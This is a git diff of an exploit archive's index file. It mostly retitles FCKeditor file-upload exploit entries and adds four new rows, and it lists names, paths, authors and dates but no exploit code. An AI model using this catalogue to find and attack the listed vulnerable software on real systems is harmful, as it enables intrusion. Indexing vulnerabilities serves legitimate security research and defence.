+11771,platforms/php/webapps/11771.txt,"osCMax 2.0 - (fckeditor) Remote File Upload",2010-03-16,ITSecTeam,php,webapps,0
 11772,platforms/php/webapps/11772.txt,"Joomla Component com_rwcards - Local File Inclusion",2010-03-16,"ALTBTA ",php,webapps,0
 11773,platforms/php/webapps/11773.txt,"Free Real Estate Contact Form 1.09 - Local File Inclusion",2010-03-16,"Pouya Daneshmand",php,webapps,0
 11774,platforms/php/webapps/11774.txt,"Online Community CMS by I-net SQL Injection Vulnerability",2010-03-16,"Th3 RDX",php,webapps,0
@@ -11192,9 +11192,9 @@ id,file,description,date,author,platform,type,port
 12248,platforms/windows/remote/12248.html,"Magneto Net Resource ActiveX 4.0.0.5 - NetConnectionEnum Exploit (Universal)",2010-04-15,dookie,windows,remote,0
 12249,platforms/php/webapps/12249.txt,"60cycleCMS 2.5.2 - (DOCUMENT_ROOT) Multiple Local File Inclusion Vulnerability",2010-04-15,eidelweiss,php,webapps,0
 12250,platforms/windows/remote/12250.html,"Magneto Net Resource ActiveX 4.0.0.5 - NetShareEnum Exploit (Universal)",2010-04-15,dookie,windows,remote,0
-12251,platforms/php/webapps/12251.php,"Camiro-CMS_beta-0.1 (fckeditor) Remote Arbitrary File Upload Exploit",2010-04-15,eidelweiss,php,webapps,0
+12251,platforms/php/webapps/12251.php,"Camiro-CMS_beta-0.1 - (fckeditor) Remote Arbitrary File Upload Exploit",2010-04-15,eidelweiss,php,webapps,0
 12252,platforms/hardware/dos/12252.txt,"IBM BladeCenter Management Module - DoS Vulnerability",2010-04-15,"Alexey Sintsov",hardware,dos,0
-12254,platforms/php/webapps/12254.txt,"CMS (fckeditor) Remote Arbitrary File Upload Exploit",2010-04-16,Mr.MLL,php,webapps,0
+12254,platforms/php/webapps/12254.txt,"FCKEditor Core - (FileManager - test.html) Remote Arbitrary File Upload Exploit",2010-04-16,Mr.MLL,php,webapps,0
 12255,platforms/windows/local/12255.rb,"Winamp 5.572 - whatsnew.txt SEH (meta)",2010-04-16,blake,windows,local,0
 12256,platforms/php/webapps/12256.txt,"ilchClan <= 1.0.5B SQL Injection Vulnerability Exploit",2010-04-16,"Easy Laster",php,webapps,0
 12257,platforms/php/webapps/12257.txt,"joomla component com_manager 1.5.3 - (id) SQL Injection Vulnerability",2010-04-16,"Islam DefenDers Mr.HaMaDa",php,webapps,0
@@ -11304,7 +11304,7 @@ id,file,description,date,author,platform,type,port
 12378,platforms/php/webapps/12378.txt,"CMS Firebrand Tec Local File Inclusion Vulnerability",2010-04-25,R3VAN_BASTARD,php,webapps,0
 12379,platforms/windows/local/12379.php,"Easyzip 2000 3.5 - (.zip) Stack Buffer Overflow PoC Exploit (0day)",2010-04-25,mr_me,windows,local,0
 12380,platforms/windows/remote/12380.pl,"Rumba ftp Client 4.2 PASV BoF (SEH)",2010-04-25,zombiefx,windows,remote,0
-12381,platforms/php/webapps/12381.php,"phpegasus (fckeditor) Remote Arbitrary File Upload Exploit",2010-04-25,eidelweiss,php,webapps,0
+12381,platforms/php/webapps/12381.php,"phpegasus 0.1.2 - (fckeditor) Remote Arbitrary File Upload Exploit",2010-04-25,eidelweiss,php,webapps,0
 12382,platforms/multiple/dos/12382.txt,"Invision Power Board - Denial of Service (0day)",2010-04-25,SeeMe,multiple,dos,0
 12383,platforms/php/webapps/12383.txt,"clipak Upload Vulnerability",2010-04-25,indoushka,php,webapps,0
 12384,platforms/php/webapps/12384.txt,"Powered by iNetScripts: Shell Upload Vulnerability",2010-04-25,Sec-q8,php,webapps,0
@@ -11458,7 +11458,7 @@ id,file,description,date,author,platform,type,port
 12553,platforms/php/webapps/12553.txt,"Dark Hart Portal (login.php) Remote File Inclusion Vulnerability",2010-05-10,CoBRa_21,php,webapps,0
 12554,platforms/php/dos/12554.txt,"MiniManager For Mangos/Trinity Server DoS Vulnerability",2010-05-10,XroGuE,php,dos,0
 12555,platforms/multiple/dos/12555.txt,"Pargoon CMS - DoS Vulnerability",2010-05-10,"Pouya Daneshmand",multiple,dos,0
-12556,platforms/php/webapps/12556.txt,"Tadbir CMS (fckeditor) Remote Arbitrary File Upload Exploit Vulnerability",2010-05-10,"Pouya Daneshmand",php,webapps,0
+12556,platforms/php/webapps/12556.txt,"Tadbir CMS - (fckeditor) Remote Arbitrary File Upload Exploit Vulnerability",2010-05-10,"Pouya Daneshmand",php,webapps,0
 12557,platforms/php/webapps/12557.txt,"family connections 2.2.3 - Multiple Vulnerabilities",2010-05-10,"Salvatore Fresta",php,webapps,0
 12558,platforms/php/webapps/12558.txt,"29o3 CMS (LibDir) Multiple RFI Vulnerability",2010-05-10,eidelweiss,php,webapps,0
 12560,platforms/php/webapps/12560.txt,"724CMS Enterprise 4.59 - SQL Injection Vulnerability",2010-05-10,cyberlog,php,webapps,0
@@ -11485,7 +11485,7 @@ id,file,description,date,author,platform,type,port
 12581,platforms/windows/remote/12581.txt,"zervit Web Server 0.4 - Source Disclosure/Download",2010-05-12,Dr_IDE,windows,remote,0
 12582,platforms/windows/remote/12582.txt,"zervit Web Server 0.4 - Directory Traversals",2010-05-12,Dr_IDE,windows,remote,0
 12583,platforms/php/webapps/12583.txt,"e-webtech (fixed_page.asp) SQL Injection Vulnerability",2010-05-12,FL0RiX,php,webapps,0
-12584,platforms/php/webapps/12584.txt,"PolyPager 1.0rc10 (fckeditor) Remote Arbitrary File Upload Vulnerability",2010-05-12,eidelweiss,php,webapps,0
+12584,platforms/php/webapps/12584.txt,"PolyPager 1.0rc10 - (fckeditor) Remote Arbitrary File Upload Vulnerability",2010-05-12,eidelweiss,php,webapps,0
 12585,platforms/php/webapps/12585.txt,"4images <= 1.7.7 (image_utils.php) Remote Command Execution Vulnerability",2010-05-12,"Sn!pEr.S!Te Hacker",php,webapps,0
 12586,platforms/php/webapps/12586.php,"IPB 3.0.1 - SQL Injection Exploit",2010-05-13,Cryptovirus,php,webapps,0
 12587,platforms/linux/remote/12587.c,"WFTPD Server 3.30 - Multiple Vulnerabilities (0day)",2010-05-13,"fl0 fl0w",linux,remote,21
@@ -11584,7 +11584,7 @@ id,file,description,date,author,platform,type,port
 12687,platforms/windows/dos/12687.pl,"WinDirectAudio 1.0 - (.WAV) PoC",2010-05-21,ahwak2000,windows,dos,0
 12688,platforms/php/webapps/12688.txt,"JV2 Folder Gallery <= 3.1 - (gallery.php) Remote File Inclusion Vulnerability",2010-05-21,"Sn!pEr.S!Te Hacker",php,webapps,0
 12689,platforms/multiple/webapps/12689.txt,"Authenticated Cross-Site Scripting Vulnerability (XSS) within Apache Axis2 administration console",2010-05-21,"Richard Brain",multiple,webapps,0
-12690,platforms/php/webapps/12690.php,"cardinalCMS 1.2 (fckeditor) Arbitrary File Upload Exploit.",2010-05-21,Ma3sTr0-Dz,php,webapps,0
+12690,platforms/php/webapps/12690.php,"cardinalCMS 1.2 - (fckeditor) Arbitrary File Upload Exploit.",2010-05-21,Ma3sTr0-Dz,php,webapps,0
 12691,platforms/php/webapps/12691.txt,"Online Job Board (Auth Bypass) SQL Injection Vulnerability",2010-05-21,"cr4wl3r ",php,webapps,0
 14322,platforms/php/webapps/14322.txt,"Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability",2010-07-10,"L0rd CrusAd3r",php,webapps,0
 12692,platforms/php/webapps/12692.txt,"TinyBrowser Remote File upload Vulnerability",2010-05-22,Ra3cH,php,webapps,0
@@ -11592,7 +11592,7 @@ id,file,description,date,author,platform,type,port
 12694,platforms/php/webapps/12694.txt,"Tochin Ecommerce Multiple Remote Vulnerability",2010-05-22,cyberlog,php,webapps,0
 12695,platforms/php/webapps/12695.txt,"Azimut Technologie Admin Login Bypass Vulnerability",2010-05-22,Ra3cH,php,webapps,0
 12696,platforms/php/webapps/12696.txt,"E-commerce Group (cat.php) SQL Injection Vulnerability",2010-05-22,"BLack Revenge",php,webapps,0
-12697,platforms/php/webapps/12697.php,"hustoj (fckeditor) Remote Arbitrary File Upload Exploit",2010-05-22,eidelweiss,php,webapps,0
+12697,platforms/php/webapps/12697.php,"hustoj - (fckeditor) Remote Arbitrary File Upload Exploit",2010-05-22,eidelweiss,php,webapps,0
 12698,platforms/windows/dos/12698.py,"Open&Compact Ftp Server 1.2 - _PORT_ command Remote DoS",2010-05-22,Ma3sTr0-Dz,windows,dos,0
 12699,platforms/php/webapps/12699.txt,"eWebEditor 1.x - (WYSIWYG) Remote File Upload",2010-05-22,Ma3sTr0-Dz,php,webapps,0
 12700,platforms/asp/webapps/12700.txt,"DotNetNuke Remote File upload Vulnerability",2010-05-22,"Ra3cH and Ma3sTr0-Dz",asp,webapps,0
@@ -12191,7 +12191,7 @@ id,file,description,date,author,platform,type,port
 13832,platforms/php/webapps/13832.txt,"ardeacore 2.2 - Remote File Inclusion Vulnerability",2010-06-11,"cr4wl3r ",php,webapps,0
 13833,platforms/php/webapps/13833.txt,"Parallels System Automation (PSA) Local File Inclusion Vulnerability",2010-06-11,"Pouya Daneshmand",php,webapps,0
 13834,platforms/windows/remote/13834.html,"Sygate Personal Firewall 5.6 build 2808 - ActiveX with DEP bypass",2010-06-11,Lincoln,windows,remote,0
-13835,platforms/php/webapps/13835.txt,"DaLogin 2.2 (FCKeditor) Remote Arbitrary File Upload Exploit",2010-06-11,eidelweiss,php,webapps,0
+13835,platforms/php/webapps/13835.txt,"DaLogin 2.2 - (FCKeditor) Remote Arbitrary File Upload Exploit",2010-06-11,eidelweiss,php,webapps,0
 13836,platforms/windows/dos/13836.py,"Solarwinds 10.4.0.13 - Denial of Service Exploit",2010-06-12,Nullthreat,windows,dos,0
 13837,platforms/windows/dos/13837.pl,"Media Player Classic 1.3.1774.0 - (mpcpl) Local DoS (PoC) (0day)",2010-06-12,R3d-D3V!L,windows,dos,0
 13838,platforms/windows/dos/13838.pl,"CP3 Studio PC Version - Denial of Service",2010-06-12,chap0,windows,dos,0
@@ -12240,11 +12240,11 @@ id,file,description,date,author,platform,type,port
 13890,platforms/php/webapps/13890.txt,"EZPX Photoblog 1.2 beta Remote File Inclusion Exploit",2010-06-16,sh00t0ut,php,webapps,0
 13891,platforms/asp/webapps/13891.html,"AspTR EXtended CSRF Bug",2010-06-16,FreWaL,asp,webapps,0
 13892,platforms/php/webapps/13892.txt,"PHPAuctionSystem Upload Vulnerability",2010-06-16,Sid3^effects,php,webapps,0
-13893,platforms/php/webapps/13893.txt,"Nakid CMS (fckeditor) Remote Arbitrary File Upload Exploit",2010-06-16,eidelweiss,php,webapps,0
+13893,platforms/php/webapps/13893.txt,"Nakid CMS 0.5.2 - (fckeditor) Remote Arbitrary File Upload Exploit",2010-06-16,eidelweiss,php,webapps,0
 13894,platforms/php/webapps/13894.txt,"2daybiz online classified system SQLi AND XSS Vulnerability",2010-06-16,Sid3^effects,php,webapps,0
 13895,platforms/windows/local/13895.py,"Rosoft Audio Converter 4.4.4 - Buffer Overflow",2010-06-16,blake,windows,local,0
 13897,platforms/php/webapps/13897.txt,"Real Estate SQL Injection Vulnerability",2010-06-16,"L0rd CrusAd3r",php,webapps,0
-13898,platforms/php/webapps/13898.pl,"DMSEasy0.9.7 (fckeditor) Arbitrary File Upload",2010-06-17,sh00t0ut,php,webapps,0
+13898,platforms/php/webapps/13898.pl,"DMSEasy 0.9.7 - (fckeditor) Arbitrary File Upload",2010-06-17,sh00t0ut,php,webapps,0
 13899,platforms/php/webapps/13899.txt,"Pithcms 0.9.5 - Local File Include Vulnerability",2010-06-17,sh00t0ut,php,webapps,0
 13900,platforms/php/webapps/13900.txt,"Easy Travel Portal SQl Vulnerable",2010-06-17,"L0rd CrusAd3r",php,webapps,0
 13901,platforms/php/webapps/13901.txt,"PenPals Authentication Bypass",2010-06-17,"L0rd CrusAd3r",php,webapps,0
@@ -12472,7 +12472,7 @@ id,file,description,date,author,platform,type,port
 14181,platforms/windows/remote/14181.py,"HP OpenView NNM getnnmdata.exe CGI Invalid ICount Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80
 14182,platforms/windows/remote/14182.py,"HP OpenView NNM getnnmdata.exe CGI Invalid Hostname Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80
 14192,platforms/asp/webapps/14192.txt,"Ziggurat Farsi CMS SQL Injection Vulnerability",2010-07-03,"Arash Saadatfar",asp,webapps,0
-14184,platforms/php/webapps/14184.txt,"SweetRice < 0.6.4 (fckeditor) Remote File Upload",2010-07-03,ITSecTeam,php,webapps,0
+14184,platforms/php/webapps/14184.txt,"SweetRice < 0.6.4 - (fckeditor) Remote File Upload",2010-07-03,ITSecTeam,php,webapps,0
 14185,platforms/multiple/dos/14185.py,"ISC-DHCPD Denial of Service",2010-07-03,sid,multiple,dos,0
 14191,platforms/windows/local/14191.pl,"ASX to MP3 Converter 3.1.2.1 - Local Buffer Overflow (SEH)",2010-07-03,Madjix,windows,local,0
 14186,platforms/php/webapps/14186.txt,"Family Connections Who is Chatting Add-On Remote File Inclusion Vulnerability",2010-07-03,lumut--,php,webapps,0
@@ -13254,7 +13254,7 @@ id,file,description,date,author,platform,type,port
 15599,platforms/windows/local/15599.py,"Xion Audio Player 1.0.127 - (m3u) Buffer Overflow Vulnerability",2010-11-23,0v3r,windows,local,0
 15600,platforms/windows/remote/15600.html,"Netcraft Toolbar 1.8.1 - Remote Code Execution Exploit",2010-11-23,Rew,windows,remote,0
 15601,platforms/windows/remote/15601.html,"ImageShack Toolbar 4.8.3.75 - Remote Code Execution Exploit",2010-11-23,Rew,windows,remote,0
-15602,platforms/php/webapps/15602.txt,"PHPMotion FCKeditor File Upload Vulnerability",2010-11-23,trycyber,php,webapps,0
+15602,platforms/php/webapps/15602.txt,"PHPMotion 1.62 - (FCKeditor) File Upload Vulnerability",2010-11-23,trycyber,php,webapps,0
 15605,platforms/php/webapps/15605.txt,"GetSimple CMS 2.01 - 2.02  - Administrative Credentials Disclosure",2010-11-24,"Michael Brooks",php,webapps,0
 15229,platforms/windows/dos/15229.pl,"FoxPlayer 2.3.0 - (.m3u) Buffer Overflow Vulnerability",2010-10-10,"Anastasios Monachos",windows,dos,0
 15230,platforms/asp/webapps/15230.txt,"Site2Nite Auto e-Manager SQL Injection Vulnerability",2010-10-10,KnocKout,asp,webapps,0
@@ -13300,7 +13300,7 @@ id,file,description,date,author,platform,type,port
 15279,platforms/windows/local/15279.rb,"FatPlayer 0.6b - (.wav) Buffer Overflow Vulnerability (SEH)",2010-10-18,"James Fitts",windows,local,0
 15280,platforms/php/webapps/15280.html,"Travel Portal Script Admin Password Change - CSRF Vulnerability",2010-10-19,KnocKout,php,webapps,0
 15276,platforms/php/webapps/15276.txt,"411cc Multiple SQL Injection Vulnerabilities",2010-10-18,KnocKout,php,webapps,0
-15277,platforms/php/webapps/15277.txt,"GeekLog 1.7.0 (fckeditor) Arbitrary File Upload Vulnerability",2010-10-18,"Kubanezi AHG",php,webapps,0
+15277,platforms/php/webapps/15277.txt,"GeekLog 1.7.0 - (fckeditor) Arbitrary File Upload Vulnerability",2010-10-18,"Kubanezi AHG",php,webapps,0
 15278,platforms/php/webapps/15278.txt,"CubeCart 2.0.1 - SQL Injection Vulnerability",2010-10-18,X_AviaTique_X,php,webapps,0
 15281,platforms/php/webapps/15281.html,"Event Ticket Portal Script Admin Password Change - CSRF Vulnerability",2010-10-19,KnocKout,php,webapps,0
 15283,platforms/windows/dos/15283.txt,"Hanso Converter <= 1.4.0 - (.ogg) Denial of Service Vulnerability",2010-10-19,anT!-Tr0J4n,windows,dos,0
@@ -13364,7 +13364,7 @@ id,file,description,date,author,platform,type,port
 15351,platforms/php/webapps/15351.rb,"mygamingladder MGL Combo System <= 7.5 game.php SQL Injection Exploit",2010-10-29,"Easy Laster",php,webapps,0
 15352,platforms/windows/remote/15352.html,"Firefox 3.6.8 - 3.6.11 Interleaving document.write and appendChild Exploit (From the Wild)",2010-10-29,Unknown,windows,remote,0
 15353,platforms/php/webapps/15353.txt,"Joomla Component com_jfuploader < 2.12 - Remote File Upload",2010-10-30,Setr0nix,php,webapps,0
-15354,platforms/php/webapps/15354.txt,"Zoopeer 0.1 & 0.2 (fckeditor) Shell Upload Vulnerability",2010-10-30,Net.Edit0r,php,webapps,0
+15354,platforms/php/webapps/15354.txt,"Zoopeer 0.1 & 0.2 - (fckeditor) Shell Upload Vulnerability",2010-10-30,Net.Edit0r,php,webapps,0
 15355,platforms/php/webapps/15355.txt,"Simpli Easy (AFC Simple) Newsletter <= 4.2 - XSS/Information Leakage",2010-10-30,p0deje,php,webapps,0
 15356,platforms/windows/dos/15356.pl,"yPlay 2.4.5 - Denial of Service Vulnerability",2010-10-30,"MOHAMED ABDI",windows,dos,0
 15357,platforms/windows/remote/15357.php,"Home FTP Server 1.11.1.149 RETR DELE RMD - Remote Directory Traversal Exploit",2010-10-30,"Yakir Wizman",windows,remote,0
@@ -13388,7 +13388,7 @@ id,file,description,date,author,platform,type,port
 15385,platforms/php/webapps/15385.txt,"Kandidat CMS 1.4.2 Stored Cross-Site Scripting Vulnerability",2010-11-02,"High-Tech Bridge SA",php,webapps,0
 15386,platforms/php/webapps/15386.txt,"MemHT Portal 4.0.1 Stored Cross-Site Scripting Vulnerability",2010-11-02,"High-Tech Bridge SA",php,webapps,0
 15387,platforms/php/webapps/15387.txt,"Webmedia Explorer 6.13.1 Stored Cross-Site Scripting Vulnerability",2010-11-02,"High-Tech Bridge SA",php,webapps,0
-15389,platforms/php/webapps/15389.php,"MetInfo 3.0 (fckeditor) Arbitrary File Upload Vulnerability",2010-11-02,[sh3n],php,webapps,0
+15389,platforms/php/webapps/15389.php,"MetInfo 3.0 - (fckeditor) Arbitrary File Upload Vulnerability",2010-11-02,[sh3n],php,webapps,0
 15391,platforms/php/webapps/15391.txt,"Azaronline Design SQL Injection Vulnerability",2010-11-02,XroGuE,php,webapps,0
 15394,platforms/windows/dos/15394.txt,"Maxthon 3.0.18.1000 CSS Denial of Service Vulnerability",2010-11-02,4n0nym0us,windows,dos,0
 15395,platforms/asp/webapps/15395.txt,"Site2Ntite Vacation Rental (VRBO) Listings SQL Injection Vulnerability",2010-11-02,"L0rd CrusAd3r",asp,webapps,0
@@ -13444,7 +13444,7 @@ id,file,description,date,author,platform,type,port
 15452,platforms/php/webapps/15452.txt,"Punbb 1.3.4 - Multiple Full Path Disclosure Vulnerability",2010-11-07,SYSTEM_OVERIDE,php,webapps,0
 15453,platforms/php/webapps/15453.txt,"Joomla Component (com_ckforms) Local File Inclusion Vulnerability",2010-11-08,"ALTBTA ",php,webapps,0
 15454,platforms/php/webapps/15454.txt,"Joomla Component (com_clan) SQL Injection Vulnerability",2010-11-08,"AtT4CKxT3rR0r1ST ",php,webapps,0
-15455,platforms/php/webapps/15455.txt,"xt:Commerce Shopsoftware (fckeditor) Arbitrary File Upload Vulnerability",2010-11-08,Net.Edit0r,php,webapps,0
+15455,platforms/php/webapps/15455.txt,"xt:Commerce Shopsoftware 3 & 4 - (fckeditor) Arbitrary File Upload Vulnerability",2010-11-08,Net.Edit0r,php,webapps,0
 15456,platforms/php/webapps/15456.txt,"Joomla Component (com_clanlist) SQL Injection Vulnerability",2010-11-08,CoBRa_21,php,webapps,0
 15494,platforms/windows/dos/15494.pl,"VbsEdit 4.7.2.0 - (.vbs) Buffer Overflow Vulnerability",2010-11-12,anT!-Tr0J4n,windows,dos,0
 15495,platforms/windows/dos/15495.py,"Power Audio Editor 7.4.3.230 - (.cda) Denial of Service Vulnerability",2010-11-12,anT!-Tr0J4n,windows,dos,0
@@ -13461,7 +13461,7 @@ id,file,description,date,author,platform,type,port
 15468,platforms/php/webapps/15468.txt,"Joomla Component (btg_oglas) HTML & XSS Injection Vulnerability",2010-11-09,CoBRa_21,php,webapps,0
 15469,platforms/php/webapps/15469.txt,"Joomla Component (com_markt) SQL Injection Vulnerability",2010-11-09,CoBRa_21,php,webapps,0
 15470,platforms/php/webapps/15470.txt,"Joomla Component (com_img) LFI Vulnerability",2010-11-09,CoBRa_21,php,webapps,0
-15484,platforms/php/webapps/15484.txt,"FCKeditor 2.x <= 2.4.3 - Arbitrary File Upload Vulnerability",2010-11-10,grabz,php,webapps,0
+15484,platforms/php/webapps/15484.txt,"FCKEditor Core 2.x <= 2.4.3 - (FileManager - upload.php) Arbitrary File Upload Vulnerability",2010-11-10,grabz,php,webapps,0
 15472,platforms/php/webapps/15472.txt,"osCommerce 2.2 - CSRF",2010-11-09,daandeveloper33,php,webapps,0
 15473,platforms/multiple/webapps/15473.html,"IBM OmniFind CSRF Vulnerability",2010-11-09,"Fatih Kilic",multiple,webapps,0
 15474,platforms/multiple/dos/15474.txt,"IBM OmniFind Buffer Overflow Vulnerability",2010-11-09,"Fatih Kilic",multiple,dos,0
@@ -13829,7 +13829,7 @@ id,file,description,date,author,platform,type,port
 15946,platforms/windows/dos/15946.py,"IrfanView 4.28 - Multiple Denial of Service Vulnerabilities",2011-01-09,BraniX,windows,dos,0
 15958,platforms/php/webapps/15958.txt,"Joomla Captcha Plugin <= 4.5.1 - Local File Disclosure Vulnerability",2011-01-09,dun,php,webapps,0
 15959,platforms/windows/dos/15959.pl,"Macro Express Pro 4.2.2.1 MXE File Syntactic Analysis Buffer Overflow PoC",2011-01-10,LiquidWorm,windows,dos,0
-15960,platforms/php/webapps/15960.txt,"Maximus CMS (fckeditor) Arbitrary File Upload Vulnerability",2011-01-10,eidelweiss,php,webapps,0
+15960,platforms/php/webapps/15960.txt,"Maximus CMS 1.1.2 - (fckeditor) Arbitrary File Upload Vulnerability",2011-01-10,eidelweiss,php,webapps,0
 15962,platforms/solaris/local/15962.c,"Linux Kernel - Solaris < 5.10 138888-01 - Local Root Exploit",2011-01-10,peri.carding,solaris,local,0
 15963,platforms/windows/remote/15963.rb,"Windows Common Control Library (Comctl32) - Heap Overflow (MS10-081)",2011-01-10,"Nephi Johnson",windows,remote,0
 15964,platforms/php/webapps/15964.py,"Lotus CMS Fraise 3.0 - LFI - Remote Code Execution Exploit",2011-01-10,mr_me,php,webapps,0
@@ -15028,7 +15028,7 @@ id,file,description,date,author,platform,type,port
 17275,platforms/windows/local/17275.pl,"A-PDF All to MP3 Converter 2.0.0 - DEP Bypass",2011-05-12,h1ch4m,windows,local,0
 17276,platforms/windows/webapps/17276.txt,"Oracle GlassFish Server Administration Console Authentication Bypass",2011-05-12,"Core Security",windows,webapps,0
 17279,platforms/hardware/remote/17279.txt,"DreamBox DM500(+) - Arbitrary File Download Vulnerability",2011-05-13,LiquidWorm,hardware,remote,0
-17284,platforms/php/webapps/17284.txt,"EditorMonkey WordPress Plugin (FCKeditor) 2.5 - Arbitrary File Upload",2011-05-14,kaMtiEz,php,webapps,0
+17284,platforms/php/webapps/17284.txt,"EditorMonkey WordPress Plugin 2.5 -  (FCKeditor) Arbitrary File Upload",2011-05-14,kaMtiEz,php,webapps,0
 17285,platforms/php/webapps/17285.php,"osCommerce 2.3.1 (banner_manager.php) Remote File Upload Vulnerability",2011-05-14,"Number 7",php,webapps,0
 17287,platforms/windows/dos/17287.mid,"Winamp 5.61 - 'in_midi' component heap Overflow (crash only)",2011-05-15,"Alexander Gavrun",windows,dos,0
 17288,platforms/php/webapps/17288.txt,"Joomla Component com_question - SQL Injection Vulnerability",2011-05-15,"NeX HaCkEr",php,webapps,0
@@ -15324,7 +15324,7 @@ id,file,description,date,author,platform,type,port
 17641,platforms/php/webapps/17641.txt,"Lasernet CMS 1.5 - SQL Injection Vulnerability",2011-08-09,p0pc0rn,php,webapps,0
 17642,platforms/windows/dos/17642.txt,"Acoustica Mixcraft 1.00 - Local Crash",2011-08-09,NassRawI,windows,dos,0
 17643,platforms/windows/dos/17643.pl,"Excel SLYK Format Parsing Buffer Overrun Vulnerability PoC",2011-08-09,webDEViL,windows,dos,0
-17644,platforms/php/webapps/17644.txt,"FCKeditor - Arbitrary File Upload Vulnerability",2011-08-09,pentesters.ir,php,webapps,0
+17644,platforms/php/webapps/17644.txt,"FCKEditor Core - (FileManager - test.html) Arbitrary File Upload Vulnerability",2011-08-09,pentesters.ir,php,webapps,0
 17645,platforms/hardware/remote/17645.py,"iphone/ipad phone drive 1.1.1 - Directory Traversal",2011-08-09,IRCRASH,hardware,remote,0
 17646,platforms/php/webapps/17646.txt,"TNR Enhanced Joomla Search <= SQL Injection Vulnerability",2011-08-09,NoGe,php,webapps,0
 17647,platforms/windows/local/17647.rb,"A-PDF All to MP3 2.3.0 - Universal DEP Bypass Exploit",2011-08-10,"C4SS!0 G0M3S",windows,local,0
@@ -20250,7 +20250,7 @@ id,file,description,date,author,platform,type,port
 23001,platforms/php/webapps/23001.txt,"Invision Power Board 1.0/1.1/1.2 Admin.PHP Cross-Site Scripting Vulnerability",2003-08-09,"Boy Bear",php,webapps,0
 23002,platforms/windows/remote/23002.txt,"MDaemon SMTP Server 5.0.5 Null Password Authentication Vulnerability",2003-08-09,"Buckaroo Banzai",windows,remote,0
 23004,platforms/multiple/webapps/23004.txt,"Oracle OpenSSO 8.0 - Multiple XSS POST Injection Vulnerabilities",2012-11-29,LiquidWorm,multiple,webapps,0
-23005,platforms/asp/webapps/23005.txt,"FCKEditor ASP 2.6.8 - File Upload Protection Bypass",2012-11-29,"Soroush Dalili",asp,webapps,0
+23005,platforms/asp/webapps/23005.txt,"FCKEditor Core ASP 2.6.8 - File Upload Protection Bypass",2012-11-29,"Soroush Dalili",asp,webapps,0
 23017,platforms/php/webapps/23017.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 earch Module PDA_limit Parameter XSS",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0
 23018,platforms/php/webapps/23018.txt,"PHPOutsourcing Zorum 3.4 Path Disclosure Vulnerability",2003-08-11,"Zone-h Security Team",php,webapps,0
 23019,platforms/windows/remote/23019.c,"Microsoft Windows 2000 - Subnet Bandwidth Manager RSVP Server Authority Hijacking Vulnerability",2003-08-11,root@networkpenetration.com,windows,remote,0
@@ -32832,7 +32832,7 @@ id,file,description,date,author,platform,type,port
 36398,platforms/lin_x86/shellcode/36398.c,"Linux/x86 - TCP Bind Shell (96 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
 36407,platforms/php/webapps/36407.txt,"Elxis CMS 2009 administrator/index.php URI XSS",2011-12-05,"Ewerson Guimaraes",php,webapps,0
 36408,platforms/php/webapps/36408.txt,"WordPress Pretty Link Plugin 1.5.2 'pretty-bar.php' Cross Site Scripting Vulnerability",2011-12-06,Am!r,php,webapps,0
-36410,platforms/php/webapps/36410.txt,"Simple Machines Forum 1.1.15 ''fckeditor' Arbitrary File Upload Vulnerability",2011-12-06,HELLBOY,php,webapps,0
+36410,platforms/php/webapps/36410.txt,"Simple Machines Forum 1.1.15 - 'fckeditor' Arbitrary File Upload Vulnerability",2011-12-06,HELLBOY,php,webapps,0
 36412,platforms/windows/remote/36412.rb,"IPass Control Pipe Remote Command Execution",2015-03-16,metasploit,windows,remote,0
 36413,platforms/php/webapps/36413.txt,"WordPress SEO by Yoast 1.7.3.3 - Blind SQL Injection",2015-03-16,"Ryan Dewhurst",php,webapps,0
 36401,platforms/php/webapps/36401.txt,"AtMail 1.04 'func' Parameter Multiple Cross-Site Scripting Vulnerabilities",2011-12-01,Dognædis,php,webapps,0
@@ -33811,7 +33811,7 @@ id,file,description,date,author,platform,type,port
 37454,platforms/hardware/webapps/37454.txt,"D-Link DSP-W w110 v1.05b01 - Multiple Vulnerabilities",2015-07-01,DNO,hardware,webapps,0
 37499,platforms/php/webapps/37499.txt,"Phonalisa Multiple HTML-Injection Cross-Site Scripting",2012-07-12,"Benjamin Kunz Mejri",php,webapps,0
 37456,platforms/windows/dos/37456.html,"McAfee SiteAdvisor 3.7.2 (firefox) Use After Free PoC",2015-07-01,"Marcin Ressel",windows,dos,0
-37457,platforms/php/webapps/37457.html,"FCKEditor 'spellchecker.php' Cross Site Scripting Vulnerability",2012-06-25,"Emilio Pinna",php,webapps,0
+37457,platforms/php/webapps/37457.html,"FCKEditor Core - (Editor - 'spellchecker.php') Cross Site Scripting Vulnerability",2012-06-25,"Emilio Pinna",php,webapps,0
 37458,platforms/windows/dos/37458.pl,"Winamp 5.13 '.m3u' File Exception Handling Remote Denial of Service Vulnerability",2012-06-25,Dark-Puzzle,windows,dos,0
 37459,platforms/php/webapps/37459.txt,"Umapresence Local File Include and Arbitrary File Deletion Vulnerabilities",2012-06-25,"Sammy FORGIT",php,webapps,0
 37460,platforms/php/webapps/37460.txt,"Schoolhos CMS HTML Injection Vulnerabilities",2012-06-27,the_cyber_nuxbie,php,webapps,0
@@ -34037,3 +34037,7 @@ id,file,description,date,author,platform,type,port
 37707,platforms/php/webapps/37707.txt,"WordPress Count Per Day Plugin 3.4 - SQL Injection",2015-07-27,"High-Tech Bridge SA",php,webapps,80
 37708,platforms/php/webapps/37708.txt,"Xceedium Xsuite - Multiple Vulnerabilities",2015-07-27,modzero,php,webapps,0
 37709,platforms/php/webapps/37709.txt,"phpFileManager 0.9.8 - Remote Command Execution Vulnerability",2015-07-28,"John Page",php,webapps,0
+37710,platforms/linux/local/37710.txt,"Sudo <=1.8.14 - Unauthorized Privilege",2015-07-28,"daniel svartman",linux,local,0
+37712,platforms/php/webapps/37712.txt,"phpFileManager 0.9.8 - CSRF Vulnerability",2015-07-29,"John Page",php,webapps,80
+37715,platforms/php/webapps/37715.txt,"Tendoo CMS 1.3 - XSS Vulnerabilities",2015-07-29,"Arash Khazaei",php,webapps,80
+37716,platforms/windows/local/37716.c,"Heroes of Might and Magic III - Map Parsing Arbitrary Code Execution",2015-07-29,"John AAkerblom",windows,local,0
diff --git a/platforms/asp/webapps/23005.txt b/platforms/asp/webapps/23005.txt
index 966be1d80..6f547ef63 100755
--- a/platforms/asp/webapps/23005.txt
